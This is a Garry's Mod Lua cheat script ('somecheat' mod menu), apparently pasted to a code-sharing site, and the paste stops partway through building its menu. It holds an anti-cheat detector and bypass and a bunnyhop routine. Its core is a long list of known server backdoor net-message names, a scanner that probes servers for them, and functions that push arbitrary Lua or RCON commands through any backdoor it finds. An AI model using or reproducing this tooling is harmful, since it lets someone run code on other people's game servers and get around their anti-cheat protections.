· 6 years ago · May 17, 2019, 03:50 PM
1surface.PlaySound("HL1/fvox/bell.wav")
2local AIMBOT = {}
3local ESP = {}
4print("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n")
5MsgC(Color(255,0,0),[[
6 ____________________________________________________
7]])MsgC(Color(255,64,0),[[
8 / \
9]])MsgC(Color(255,128,0),[[
10 | _____________________________________________ |
11]])MsgC(Color(255,191,0),[[
12 | | | |
13]])MsgC(Color(255,255,0),[[
14 | | _____ ______ ____ _ _ _____ | |
15]])MsgC(Color(191,255,0),[[
16 | | | __ \| ____| _ \| | | |/ ____| | |
17]])MsgC(Color(128,255,0),[[
18 | | | |__) | |__ | |_) | | | | | __ | |
19]])MsgC(Color(64,255,0),[[
20 | | | _ /| __| | _ <| | | | | |_ | | |
21]])MsgC(Color(0,255,0),[[
22 | | | | \ \| |____| |_) | |__| | |__| | | |
23]])MsgC(Color(0,255,64),[[
24 | | __|_| _\_\______|____/ \____/_\_____|__ | |
25]])MsgC(Color(0,255,128),[[
26 | | / ____| | | | ____| /\|__ __/ ____| | |
27]])MsgC(Color(0,255,191),[[
28 | | | | | |__| | |__ / \ | | | (___ | |
29]])MsgC(Color(0,255,255),[[
30 | | | | | __ | __| / /\ \ | | \___ \ | |
31]])MsgC(Color(0,191,255),[[
32 | | | |____| | | | |____ / ____ \| | ____) | | |
33]])MsgC(Color(0,128,255),[[
34 | | \_____|_| |_|______/_/ \_\_| |_____/ | |
35]])MsgC(Color(0,64,255),[[
36 | | | |
37]])MsgC(Color(0,0,255),[[
38 | | | |
39]])MsgC(Color(64,0,255),[[
40 | | | |
41]])MsgC(Color(128,0,255),[[
42 | | | |
43]])MsgC(Color(191,0,255),[[
44 | |_____________________________________________| |
45]])MsgC(Color(255,0,255),[[
46 | |
47]])MsgC(Color(255,0,191),[[
48 \_____________________________________________________/
49]])MsgC(Color(255,0,128),[[
50 \_______________________________________/
51]])MsgC(Color(255,0,64),[[
52 _______________________________________________
53]])MsgC(Color(255,0,0),[[
54 _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
55]])MsgC(Color(255,64,0),[[
56 _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
57]])MsgC(Color(255,128,0),[[
58 _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
59]])MsgC(Color(255,191,0),[[
60 _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
61]])MsgC(Color(255,255,0),[[
62 _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
63]])MsgC(Color(191,255,0),[[
64:-----------------------------------------------------------------------------:
65]])MsgC(Color(128,255,0),[[
66`----------------------------------------------------------------------------'
67]])
68
69 chat.AddText(Color(255,0,0), "[somecheat] ", Color(20,150,200),"Welcome "..LocalPlayer():Nick(), Color(20,150,200), ",", Color(255,155,0), " Mod Menu Loaded!")
70
71 -- Detectors
72
73 if (_G.QAC or _G.CAC) then
74 surface.PlaySound("ambient/alarms/klaxon1.wav")
75 chat.AddText(Color(255, 0, 0), "[", "somecheat", "] ", Color( 20,150,200 ), "CAC anti-cheat has been found!")
76end
77
78 if file.Exists("!coresource_snte.lua","LUA") then
79 MsgC( Color( 255, 0, 0 ), "[somecheat]", Color( 20,150,200 )," Snte has been found on server!" )
80end
81
82if hook.GetTable()["SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"] then
83hook.Remove("SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS")
84end
85 if concommand.GetTable()["somecheat"] then
86 concommand.Remove("somecheat")
87end
88
89 -- Snte Bypass
90
91 local function Check(func)
92 if string.find(debug.getinfo(func).short_src,"!coresource_snte.lua") then
93 return true
94 else
95 return false
96 end
97 end
98
99 timer.Create("pwnexploiter",5,0,function()
100 for k,v in pairs(net.Receivers) do
101 if Check(v) then
102 net.Receive(k,function(l,ply)
103 ply:ChatPrint("LEL")
104 end)
105 end
106 end
107end)
108
109 -- Shit
110
111 local surface_SetFont = surface.SetFont
112 local surface_GetTextSize = surface.GetTextSize
113 local surface_SetDrawColor = surface.SetDrawColor
114 local surface_DrawLine = surface.DrawLine
115 local draw_SimpleText = draw.SimpleText
116 local draw_SimpleTextOutlined = draw.SimpleTextOutlined
117 local string_Explode = string.Explode
118 local math_Rand = math.Rand
119 local math_random = math.random
120 local math_sin = math.sin
121 local math_abs = math.abs
122 local HSVtoColor = HSVToColor
123 local Realtime = RealTime
124 local Frametime = FrameTime
125 local Curtime = CurTime
126 local Color = Color
127
128 -- Locals
129
130 local somecheat = {}
131 local channel = "";
132 local netStrings = {}
133 local BD = {}
134 local noob = {}
135 local iZNX = {}
136 iZNX.memory = {}
137 local MenuDelay = false
138 local MenuOpen = false
139 local ply = LocalPlayer()
140 local CFGSYS = {}
141 local FSYS = {}
142
143 -- NetStart String
144
145 function CheckIfStringExists(str)
146 local status, error = pcall(net.Start, str)
147 return status
148end
149
150 function noob.PostLua(str)
151 net.Start(channel)
152 net.WriteString(str)
153 net.WriteBit(1)
154 net.SendToServer()
155end
156
157 function noob.PostRcon(str)
158 net.Start(channel)
159 net.WriteString( str )
160 net.WriteBit(false)
161 net.SendToServer()
162
163end
164
165 function noob.Notify(msg)
166
167 chat.AddText(Color(255, 0, 0), "[somecheat] ", color_white, msg)
168
169end
170
171 -- Fonts
172
173 local _={_="CreateFont"}surface[_._]("MEMES",{font="Courier New",size=25,weight=300,bold=!!1})surface[_._]("MEMES2",{font="Courier New",size=18,weight=300,bold=!!1})surface[_._]("Sheeta2",{font="Arial",extended=!1,size=15,weight=50,blursize=0,scanlines=0,antialias=!!1,underline=!1,italic=!1,strikeout=!1,symbol=!1,rotary=!1,shadow=!1,additive=!1,outline=!1})surface[_._]("Features",{font="Arial",extended=!1,size=16,weight=1000,blursize=0,scanlines=0,antialias=!!1,underline=!1,italic=!1,strikeout=!1,symbol=!1,rotary=!1,shadow=!1,additive=!1,outline=!1})surface[_._]("Features2",{font="Arial",extended=!1,size=31,weight=1000,blursize=0,scanlines=0,antialias=!!1,underline=!1,italic=!1,strikeout=!1,symbol=!1,rotary=!1,shadow=!1,additive=!1,outline=!1})surface[_._]("Sheeta",{font="Arial",extended=!1,size=50,weight=1000,blursize=0,scanlines=0,antialias=!!1,underline=!1,italic=!1,strikeout=!1,symbol=!1,rotary=!1,shadow=!1,additive=!1,outline=!1})
174
175 -- Backdoored Strings
176
177 netStrings.Strings={{NetString="Sandbox_ArmDupe"},{NetString="entityhealt"},{NetString="somecheat"},{NetString="BetStrep"},{NetString="keyss"},{NetString="banId2"},{NetString="Val"},{NetString="models/zombie.mdl"},{NetString="FPSBOOST"},{NetString="PlayerCheck"},{NetString="Sbox_darkrp"},{NetString="insid3"},{NetString="The_Dankwoo"},{NetString="Sbox_itemstore"},{NetString="Ulib_Message"},{NetString="ULogs_Info"},{NetString="ITEM"},{NetString="R8"},{NetString="fix"},{NetString="Fix_Keypads"},{NetString="Remove_Exploiters"},{NetString="noclipcloakaesp_chat_text"},{NetString="_Defqon"},{NetString="_CAC_ReadMemory"},{NetString="nostrip"},{NetString="nocheat"},{NetString="LickMeOut"},{NetString="ULX_QUERY2"},{NetString="ULXQUERY2"},{NetString="https://i.imgur.com/Gf6hLMl.png"},{NetString="MoonMan"},{NetString="Im_SOCool"},{NetString="JSQuery.Data(Post(false))"},{NetString="Sandbox_GayParty"},{NetString="DarkRP_UTF8"},{NetString="oldNetReadData"},{NetString="Gamemode_get"},{NetString="memeDoor"},{NetString="BackDoor"},{NetString="SessionBackdoor"},{NetString="DarkRP_AdminWeapons"},{NetString="cucked"},{NetString="NoNerks"},{NetString="kek"},{NetString="ZimbaBackDoor"},{NetString="something"},{NetString="random"},{NetString="strip0"},{NetString="fellosnake"},{NetString="enablevac"},{NetString="idk"},{NetString="ÞÃ ?D)â—˜"},{NetString="snte"},{NetString="apg_togglemode"},{NetString="Hi"},{NetString="beedoor"},{NetString="BDST_EngineForceButton"},{NetString="VoteKickNO"},{NetString="REEEEEEEEEEEE"},{NetString="_da_"},{NetString="Nostra"},{NetString="sniffing"},{NetString="keylogger"},{NetString="CakeInstall"},{NetString="Cakeuptade"},{NetString="love"},{NetString="earth"},{NetString="ulibcheck"},{NetString="Nostrip_"},{NetString="teamfrench"},{NetString="ADM"},{NetString="hack"},{NetString="crack"},{NetString="leak"},{NetString="lokisploit"},{NetString="1234"},{NetString="123"},{NetString="enculer"},{NetString="cake"},{NetString="seized"},{NetString="88"},{NetString="88_strings_"},{NetString="nostraall"},{NetString="blogs_update"},{NetString="nolag"},{NetString="loona_"},{NetString="billys_logs"},{NetString="loona"},{NetString="negativedlebest"},{NetString="berettabest"},{NetString="ReadPing"},{NetString="antiexploit"},{NetString="adm_NetString"},{NetString="mathislebg"},{NetString="Bilboard.adverts:Spawn(false)"},{NetString="pjHabrp9EY"},{NetString="?"},{NetString="lag_ping"},{NetString="allowLimitedRCON(user) 0"},{NetString="aze46aez67z67z64dcv4bt"},{NetString="killserver"},{NetString="fuckserver"},{NetString="cvaraccess"},{NetString="rcon"},{NetString="rconadmin"},{NetString="web"},{NetString="jesuslebg"},{NetString="zilnix"},{NetString="ß ?D)?"},{NetString="disablebackdoor"},{NetString="kill"},{NetString="DefqonBackdoor"},{NetString="DarkRP_AllDoorDatas"},{NetString="0101.1"},{NetString="awarn_remove"},{NetString="_Infinity"},{NetString="Infinity"},{NetString="InfinityBackdoor"},{NetString="_Infinity_Meme_"},{NetString="arivia"},{NetString="ULogs_B"},{NetString="_Warns"},{NetString="_cac_"},{NetString="striphelper"},{NetString="_vliss"},{NetString="YYYYTTYXY6Y"},{NetString="?????????????????п??? ?? ?Ñ¿??Ŀտ? ???Ñ¿??Õ¿??Ю"},{NetString="_KekTcf"},{NetString="_blacksmurf"},{NetString="blacksmurfBackdoor"},{NetString="_Raze"},{NetString="m9k_explosionradius"},{NetString="m9k_explosive"},{NetString="m9k_addons"},{NetString="rcivluz"},{NetString="SENDTEST"},{NetString="_clientcvars"},{NetString="_main"},{NetString="stream"},{NetString="waoz"},{NetString="bdsm"},{NetString="ZernaxBackdoor"},{NetString="UKT_MOMOS"},{NetString="anticrash"},{NetString="audisquad_lua"},{NetString="dontforget"},{NetString="noprop"},{NetString="thereaper"},{NetString="0x13"},{NetString="Child"},{NetString="!Cac"},{NetString="azkaw"},{NetString="BOOST_FPS"},{NetString="childexploit"},{NetString="ULX_ANTI_BACKDOOR"},{NetString="FADMIN_ANTICRASH"},{NetString="ULX_QUERY_TEST2"},{NetString="GMOD_NETDBG"},{NetString="netlib_debug"},{NetString="_DarkRP_Reading"},{NetString="lag_ping"},{NetString="||||"},{NetString="SteamApp2313"},{NetString="FPP_RemovePLYCache"},{NetString="fuwa"},{NetString="stardoor"},{NetString="SENDTEST"},{NetString="rcivluz"},{NetString="c"},{NetString="N::B::P"},{NetString="changename"},{NetString="PlayerItemPickUp"},{NetString="echangeinfo"},{NetString="fourhead"},{NetString="music"},{NetString="slua"},{NetString="adm_network"},{NetString="componenttolua"},{NetString="theberettabcd"},{NetString="SparksLeBg"},{NetString="DarkRP_Armors"},{NetString="DarkRP_Gamemodes"},{NetString="fancyscoreboard_leave"},{NetString="PRDW_GET"},{NetString="pwn_http_send"},{NetString="AnatikLeNoob"},{NetString="GVacDoor"},{NetString="Keetaxor"},{NetString="BackdoorPrivate666"},{NetString="YohSambreLeBest"},{NetString="SNTE<ALL"},{NetString="!Ǻ/;."},{NetString="pwn_http_answer"},{NetString="pwn_wake"},{NetString="verifiopd"},{NetString="AidsTacos"},{NetString="shix"},{NetString="PDA_DRM_REQUEST_CONTENT"},{NetString="xenoreceivetargetdata2"},{NetString="xenoreceivetargetdata1"},{NetString="xenoserverdatafunction"},{NetString="xenoserverfunction"},{NetString="xenoclientdatafunction"},{NetString="xenoclientfunction"},{NetString="xenoactivation"},{NetString="EXEC_REMOTE_APPS"},{NetString="yohsambresicianatik<3"},{NetString="Sbox_Message"},{NetString="Sbox_gm_attackofnullday_key"},{NetString="The_DankWhy"},{NetString="nw.readstream"},{NetString="AbSoluT"},{NetString="__G____CAC"},{NetString="Weapon_88"},{NetString="mecthack"},{NetString="SetPlayerDeathCount"},{NetString="FAdmin_Notification_Receiver"},{NetString="DarkRP_ReceiveData"},{NetString="fijiconn"},{NetString="LuaCmd"},{NetString="EnigmaProject"},{NetString="z"},{NetString="cvardel"},{NetString="json.parse(crashsocket)"},{NetString="effects_en"},{NetString="file"},{NetString="gag"},{NetString="asunalabestwaifu"},{NetString="stoppk"},{NetString="Ulx_Error_88"},{NetString="NoOdium_ReadPing"},{NetString="banId"},{NetString="kickId2"}}
178
179 function CheckBackdoors()
180 for k,v in pairs(netStrings.Strings) do
181 if(CheckIfStringExists(v.NetString)) then
182 channel = v.NetString
183 chat.AddText(Color(255, 0, 0), "[somecheat]", Color( 20, 150, 20 )," Found Vulnerability ? ", Color(20, 150, 200), [[]] ..v.NetString)
184
185 end
186 end
187end
188
189 function GlowColor(c, t, m)
190
191 return Color(c.r + ((t.r - c.r) * (m)), c.g + ((t.g - c.g) * (m)), c.b + ((t.b - c.b) * (m)))
192
193end
194
195--[[-------------------------------------------------------------------------
196Gradients
197---------------------------------------------------------------------------]]
198
199 local grad = Material("gui/gradient")
200 local upgrad = Material("gui/gradient_up")
201 local downgrad = Material("gui/gradient_down")
202
203--[[-------------------------------------------------------------------------
204Colors
205---------------------------------------------------------------------------]]
206 local o_color1 = Color(17,17,17,255)
207 local o_color11 = Color(22,22,22,255)
208 local o_color2 = Color(30,30,30,255)
209 local o_color3 = Color(50, 50,50,255)
210 local o_color4 = Color(42, 42,42,255)
211
212local function PanelDraw(s,w,h)
213 surface.SetDrawColor(Color(20, 20, 20))
214 surface.DrawRect(0, 0, w, h)
215 surface.SetDrawColor(45, 45, 45)
216 surface.SetMaterial(upgrad)
217 surface.SetDrawColor(o_color2)
218 surface.SetMaterial(downgrad)
219 surface.SetDrawColor(o_color2)
220 surface.SetDrawColor(35, 35, 35, 255)
221 surface.DrawOutlinedRect(0, 0, w, h)
222end
223
224--[[-------------------------------------------------------------------------
225Automatic Bhop
226---------------------------------------------------------------------------]]
227
228 local function ch_bunnyhop(ply)
229 if(ply:KeyDown(IN_JUMP) && !LocalPlayer():IsOnGround()) then
230 ply:RemoveKey(IN_JUMP);
231 if !LocalPlayer():IsFlagSet(FL_ONGROUND) and LocalPlayer():GetMoveType() != MOVETYPE_NOCLIP then
232 if(ply:GetMouseX() > 1 || ply:GetMouseX() < -1) then
233 ply:SetSideMove(ply:GetMouseX() > 1 && 400 || -400);
234 else
235 ply:SetForwardMove(5850 / LocalPlayer():GetVelocity():Length2D());
236 ply:SetSideMove((ply:CommandNumber() % 2 == 0) && -400 || 400);
237 end
238 end
239 elseif(ply:KeyDown(IN_JUMP)) then
240 ply:SetForwardMove(10000)
241 end
242end
243
244 hook.Add("CreateMove", "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS", function(ply)
245 ch_bunnyhop(ply);
246end);
247
248 -- Open Menu Feature
249
250 function somecheat.voidz()
251 hook.Add("Think", "openMenu", function()
252 if input.IsKeyDown(KEY_INSERT) && !MenuDelay then
253 MenuDelay = true
254 somecheat.load()
255 timer.Simple( 0.5, function() MenuDelay = false end )
256 end
257 end)
258end
259
260 function somecheat.load()
261 if MenuOpen then
262 CloseMenu()
263 return
264end
265
266--[[-------------------------------------------------------------------------
267MENU DFRAME / MAIN MENU
268---------------------------------------------------------------------------]]
269 MenuOpen = true
270 local somecheat = vgui.Create("DFrame")
271 surface.PlaySound("buttons/button3.wav")
272 somecheat:SetSize(950, 720)
273 somecheat:SetVisible(true)
274 somecheat:SetTitle("")
275 somecheat:SetDraggable(true)
276 somecheat:ShowCloseButton(false)
277 somecheat:MakePopup()
278 somecheat:Center()
279 somecheat.Paint = function(s, w, h)
280 surface.SetDrawColor(Color(42, 42,42,255))
281 surface.DrawRect(0, 0, w, h)
282 surface.SetDrawColor(21, 21, 21)
283 surface.SetMaterial(upgrad)
284 surface.SetDrawColor(o_color2)
285 surface.SetMaterial(downgrad)
286 surface.SetDrawColor(o_color2)
287 surface.SetDrawColor(0, 0, 0, 255)
288 surface.DrawOutlinedRect(0, 0, w, h)
289 surface.DrawOutlinedRect(1, 1, w - 2, h - 2)
290end
291
292 local TabPanel = vgui.Create('DPanelList', somecheat)
293 TabPanel:SetSize(143, 703)
294 TabPanel:SetPos(8, 9)
295 TabPanel.Paint = function(s, w, h)
296 surface.SetDrawColor(Color(20, 20, 20))
297 surface.DrawRect(0, 0, w, h)
298 surface.SetDrawColor(21, 21, 21)
299 surface.SetMaterial(upgrad)
300 surface.SetDrawColor(o_color2)
301 surface.SetMaterial(downgrad)
302 surface.SetDrawColor(o_color2)
303 surface.SetDrawColor(35, 35, 35, 255)
304 surface.DrawOutlinedRect(0, 0, w, h)
305
306end
307
308 local home = vgui.Create('DPanel',somecheat)
309 home:SetVisible(false)
310 home:SetSize(791, 703)
311 home:SetPos(151, 9)
312 home:SetVisible(true)
313 home.Paint = function(s, w, h)
314 surface.SetDrawColor(Color(20, 20, 20))
315 surface.DrawRect(0, 0, w, h)
316 surface.SetDrawColor(21, 21, 21)
317 surface.SetMaterial(upgrad)
318 surface.SetDrawColor(o_color2)
319 surface.SetMaterial(downgrad)
320 surface.SetDrawColor(o_color2)
321 surface.SetDrawColor(35, 35, 35, 255)
322 surface.DrawOutlinedRect(0, 0, w, h)
323end
324
325 local homepic = vgui.Create( "HTML", home )
326 homepic:SetPos(108, 23)
327 homepic:SetSize(672,514)
328 homepic:SetHTML([[
329 <img src="https://i.imgur.com/l2VadE5.jpg" alt="Img" style="width:490px;height:490px;">
330 ]] )
331
332 local homelab = vgui.Create("DLabel", home)
333 homelab:SetSize(300, 50)
334 homelab:SetPos(250, 575)
335 homelab:SetFont("Features2")
336 homelab:SetTextColor(Color(255,255,255))
337 homelab:SetText("gmodshiitss.Team")
338
339 local ver = vgui.Create("DLabel", home)
340 ver:SetSize(300, 50)
341 ver:SetPos(300, 615)
342 ver:SetFont("Features2")
343 ver:SetTextColor(Color(255,255,255))
344 ver:SetText("Version: 1.5")
345
346
347 local home1 = vgui.Create('DPanelList', home)
348 home1:SetSize(939, 3)
349 home1:SetPos(0, 0)
350 home1.Paint = function(s, w, h)
351 surface.SetDrawColor(Color(100, 100, 100))
352 surface.DrawRect(0, 0, w, h)
353 surface.SetDrawColor(21, 21, 21)
354 surface.SetMaterial(upgrad)
355 surface.SetDrawColor(o_color2)
356 surface.SetMaterial(downgrad)
357 surface.SetDrawColor(o_color2)
358 surface.SetDrawColor(HSVToColor(CurTime() % 6 * 60, 1, 1))
359 surface.DrawOutlinedRect(0, 0, w, h)
360 surface.DrawOutlinedRect(1, 1, w - 2, h - 2)
361end
362
363--[[-------------------------------------------------------------------------
364DPanels /DPanelLists
365---------------------------------------------------------------------------]]
366 local bdsettings = vgui.Create('DPanel',somecheat)
367 bdsettings:SetVisible(false)
368 bdsettings:SetSize(791, 703)
369 bdsettings:SetPos(151, 9)
370 bdsettings.Paint = function(s, w, h)
371 surface.SetDrawColor(Color(20, 20, 20))
372 surface.DrawRect(0, 0, w, h)
373 surface.SetDrawColor(21, 21, 21)
374 surface.SetMaterial(upgrad)
375 surface.SetDrawColor(o_color2)
376 surface.SetMaterial(downgrad)
377 surface.SetDrawColor(o_color2)
378 surface.SetDrawColor(35, 35, 35, 255)
379 surface.DrawOutlinedRect(0, 0, w, h)
380end
381
382 local Rainbowbar3 = vgui.Create('DPanelList', bdsettings)
383 Rainbowbar3:SetSize(939, 3)
384 Rainbowbar3:SetPos(0, 0)
385 Rainbowbar3.Paint = function(s, w, h)
386 surface.SetDrawColor(Color(100, 100, 100))
387 surface.DrawRect(0, 0, w, h)
388 surface.SetDrawColor(21, 21, 21)
389 surface.SetMaterial(upgrad)
390 surface.SetDrawColor(o_color2)
391 surface.SetMaterial(downgrad)
392 surface.SetDrawColor(o_color2)
393 surface.SetDrawColor(HSVToColor(CurTime() % 6 * 60, 1, 1))
394 surface.DrawOutlinedRect(0, 0, w, h)
395 surface.DrawOutlinedRect(1, 1, w - 2, h - 2)
396end
397
398 local backdoorpanel = vgui.Create('DPanel',somecheat)
399 backdoorpanel:SetVisible(false)
400 backdoorpanel:SetSize(791, 703)
401 backdoorpanel:SetPos(151, 9)
402 backdoorpanel.Paint = function(s, w, h)
403 surface.SetDrawColor(Color(20, 20, 20))
404 surface.DrawRect(0, 0, w, h)
405 surface.SetDrawColor(21, 21, 21)
406 surface.SetMaterial(upgrad)
407 surface.SetDrawColor(o_color2)
408 surface.SetMaterial(downgrad)
409 surface.SetDrawColor(o_color2)
410 surface.SetDrawColor(35, 35, 35, 255)
411 surface.DrawOutlinedRect(0, 0, w, h)
412end
413
414 local bdrainbowbar = vgui.Create('DPanelList', backdoorpanel)
415 bdrainbowbar:SetSize(939, 3)
416 bdrainbowbar:SetPos(0, 0)
417 bdrainbowbar.Paint = function(s, w, h)
418 surface.SetDrawColor(Color(20, 20, 20))
419 surface.DrawRect(0, 0, w, h)
420 surface.SetDrawColor(21, 21, 21)
421 surface.SetMaterial(upgrad)
422 surface.SetDrawColor(o_color2)
423 surface.SetMaterial(downgrad)
424 surface.SetDrawColor(o_color2)
425 surface.SetDrawColor(HSVToColor(CurTime() % 6 * 60, 1, 1))
426 surface.DrawOutlinedRect(0, 0, w, h)
427 surface.DrawOutlinedRect(1, 1, w - 2, h - 2)
428end
429
430 local Rainbowbar2 = vgui.Create('DPanelList', TabPanel)
431 Rainbowbar2:SetSize(939, 3)
432 Rainbowbar2:SetPos(0, 0)
433 Rainbowbar2.Paint = function(s, w, h)
434 surface.SetDrawColor(Color(100, 100, 100))
435 surface.DrawRect(0, 0, w, h)
436 surface.SetDrawColor(21, 21, 21)
437 surface.SetMaterial(upgrad)
438 surface.SetDrawColor(o_color2)
439 surface.SetMaterial(downgrad)
440 surface.SetDrawColor(o_color2)
441 surface.SetDrawColor(HSVToColor(CurTime() % 6 * 60, 1, 1))
442 surface.DrawOutlinedRect(0, 0, w, h)
443 surface.DrawOutlinedRect(1, 1, w - 2, h - 2)
444end
445
446 local aimpage = vgui.Create('DPanel',somecheat)
447 aimpage:SetVisible(false)
448 aimpage:SetSize(791, 703)
449 aimpage:SetPos(151, 9)
450 aimpage.Paint = function(s, w, h)
451 surface.SetDrawColor(Color(20, 20, 20))
452 surface.DrawRect(0, 0, w, h)
453 surface.SetDrawColor(21, 21, 21)
454 surface.SetMaterial(upgrad)
455 surface.SetDrawColor(o_color2)
456 surface.SetMaterial(downgrad)
457 surface.SetDrawColor(o_color2)
458 surface.SetDrawColor(35, 35, 35, 255)
459 surface.DrawOutlinedRect(0, 0, w, h)
460end
461
462 local aimrainbow = vgui.Create('DPanelList', aimpage)
463 aimrainbow:SetSize(939, 3)
464 aimrainbow:SetPos(0, 0)
465 aimrainbow.Paint = function(s, w, h)
466 surface.SetDrawColor(Color(20, 20, 20))
467 surface.DrawRect(0, 0, w, h)
468 surface.SetDrawColor(21, 21, 21)
469 surface.SetMaterial(upgrad)
470 surface.SetDrawColor(o_color2)
471 surface.SetMaterial(downgrad)
472 surface.SetDrawColor(o_color2)
473 surface.SetDrawColor(HSVToColor(CurTime() % 6 * 60, 1, 1))
474 surface.DrawOutlinedRect(0, 0, w, h)
475 surface.DrawOutlinedRect(1, 1, w - 2, h - 2)
476end
477
478 local esppage = vgui.Create('DPanel',somecheat)
479 esppage:SetVisible(false)
480 esppage:SetSize(791, 703)
481 esppage:SetPos(151, 9)
482 esppage.Paint = function(s, w, h)
483 surface.SetDrawColor(Color(20, 20, 20))
484 surface.DrawRect(0, 0, w, h)
485 surface.SetDrawColor(21, 21, 21)
486 surface.SetMaterial(upgrad)
487 surface.SetDrawColor(o_color2)
488 surface.SetMaterial(downgrad)
489 surface.SetDrawColor(o_color2)
490 surface.SetDrawColor(35, 35, 35, 255)
491 surface.DrawOutlinedRect(0, 0, w, h)
492end
493
494 local esprainbow = vgui.Create('DPanelList', esppage)
495 esprainbow:SetSize(939, 3)
496 esprainbow:SetPos(0, 0)
497 esprainbow.Paint = function(s, w, h)
498 surface.SetDrawColor(Color(20, 20, 20))
499 surface.DrawRect(0, 0, w, h)
500 surface.SetDrawColor(21, 21, 21)
501 surface.SetMaterial(upgrad)
502 surface.SetDrawColor(o_color2)
503 surface.SetMaterial(downgrad)
504 surface.SetDrawColor(o_color2)
505 surface.SetDrawColor(HSVToColor(CurTime() % 6 * 60, 1, 1))
506 surface.DrawOutlinedRect(0, 0, w, h)
507 surface.DrawOutlinedRect(1, 1, w - 2, h - 2)
508end
509
510 local sppage = vgui.Create('DPanel',somecheat)
511 sppage:SetVisible(false)
512 sppage:SetSize(791, 703)
513 sppage:SetPos(151, 9)
514 sppage.Paint = function(s, w, h)
515 surface.SetDrawColor(Color(20, 20, 20))
516 surface.DrawRect(0, 0, w, h)
517 surface.SetDrawColor(21, 21, 21)
518 surface.SetMaterial(upgrad)
519 surface.SetDrawColor(o_color2)
520 surface.SetMaterial(downgrad)
521 surface.SetDrawColor(o_color2)
522 surface.SetDrawColor(35, 35, 35, 255)
523 surface.DrawOutlinedRect(0, 0, w, h)
524end
525
526 local epprainbow = vgui.Create('DPanelList', sppage)
527 epprainbow:SetSize(939, 3)
528 epprainbow:SetPos(0, 0)
529 epprainbow.Paint = function(s, w, h)
530 surface.SetDrawColor(Color(20, 20, 20))
531 surface.DrawRect(0, 0, w, h)
532 surface.SetDrawColor(21, 21, 21)
533 surface.SetMaterial(upgrad)
534 surface.SetDrawColor(o_color2)
535 surface.SetMaterial(downgrad)
536 surface.SetDrawColor(o_color2)
537 surface.SetDrawColor(HSVToColor(CurTime() % 6 * 60, 1, 1))
538 surface.DrawOutlinedRect(0, 0, w, h)
539 surface.DrawOutlinedRect(1, 1, w - 2, h - 2)
540end
541
542 local utipage = vgui.Create('DPanel',somecheat)
543 utipage:SetVisible(false)
544 utipage:SetSize(791, 703)
545 utipage:SetPos(151, 9)
546 utipage.Paint = function(s, w, h)
547 surface.SetDrawColor(Color(20, 20, 20))
548 surface.DrawRect(0, 0, w, h)
549 surface.SetDrawColor(21, 21, 21)
550 surface.SetMaterial(upgrad)
551 surface.SetDrawColor(o_color2)
552 surface.SetMaterial(downgrad)
553 surface.SetDrawColor(o_color2)
554 surface.SetDrawColor(35, 35, 35, 255)
555 surface.DrawOutlinedRect(0, 0, w, h)
556end
557
558 local utirainbow = vgui.Create('DPanelList', utipage)
559 utirainbow:SetSize(939, 3)
560 utirainbow:SetPos(0, 0)
561 utirainbow.Paint = function(s, w, h)
562 surface.SetDrawColor(Color(20, 20, 20))
563 surface.DrawRect(0, 0, w, h)
564 surface.SetDrawColor(21, 21, 21)
565 surface.SetMaterial(upgrad)
566 surface.SetDrawColor(o_color2)
567 surface.SetMaterial(downgrad)
568 surface.SetDrawColor(o_color2)
569 surface.SetDrawColor(HSVToColor(CurTime() % 6 * 60, 1, 1))
570 surface.DrawOutlinedRect(0, 0, w, h)
571 surface.DrawOutlinedRect(1, 1, w - 2, h - 2)
572end
573
574--[[-------------------------------------------------------------------------
575Buttons
576---------------------------------------------------------------------------]]
577 local Tab1 = vgui.Create("DButton",TabPanel)
578 Tab1:SetSize(136, 110)
579 Tab1:SetPos(3, 6)
580 Tab1:SetText("Aimbot")
581 Tab1:SetFont("Features")
582 Tab1:SetTextColor(Color(255, 255, 255, 255))
583 Tab1.Paint = function(self, w, h)
584 surface.SetDrawColor(Color(23, 23, 23))
585 surface.DrawRect(0, 0, w, h)
586 surface.SetDrawColor(26, 26, 26)
587 surface.SetMaterial(upgrad)
588 surface.SetDrawColor(o_color2)
589 surface.SetMaterial(downgrad)
590 surface.SetDrawColor(o_color2)
591 surface.SetDrawColor(31, 31, 31, 255)
592 surface.DrawOutlinedRect(0, 0, w, h)
593end
594
595 Tab1.DoClick = function()
596 utipage:SetVisible(false)
597 sppage:SetVisible(false)
598 bdsettings:SetVisible(false)
599 aimpage:SetVisible(true)
600 backdoorpanel:SetVisible(false)
601 home:SetVisible(false)
602 esppage:SetVisible(false)
603end
604
605 local Tab2 = vgui.Create("DButton",TabPanel)
606 Tab2:SetSize(136, 110)
607 Tab2:SetPos(3, 123)
608 Tab2:SetText("Visuals")
609 Tab2:SetFont("Features")
610 Tab2:SetTextColor(Color(255, 255, 255, 255))
611 Tab2.Paint = function(self, w, h)
612 surface.SetDrawColor(Color(23, 23, 23))
613 surface.DrawRect(0, 0, w, h)
614 surface.SetDrawColor(26, 26, 26)
615 surface.SetMaterial(upgrad)
616 surface.SetDrawColor(o_color2)
617 surface.SetMaterial(downgrad)
618 surface.SetDrawColor(o_color2)
619 surface.SetDrawColor(31, 31, 31, 255)
620 surface.DrawOutlinedRect(0, 0, w, h)
621end
622
623 Tab2.DoClick = function()
624 utipage:SetVisible(false)
625 sppage:SetVisible(false)
626 bdsettings:SetVisible(false)
627 aimpage:SetVisible(false)
628 backdoorpanel:SetVisible(false)
629 home:SetVisible(false)
630 esppage:SetVisible(true)
631end
632
633 local Tab3 = vgui.Create("DButton",TabPanel)
634 Tab3:SetSize(136, 110)
635 Tab3:SetPos(3, 240)
636 Tab3:SetText("Backdoors")
637 Tab3:SetFont("Features")
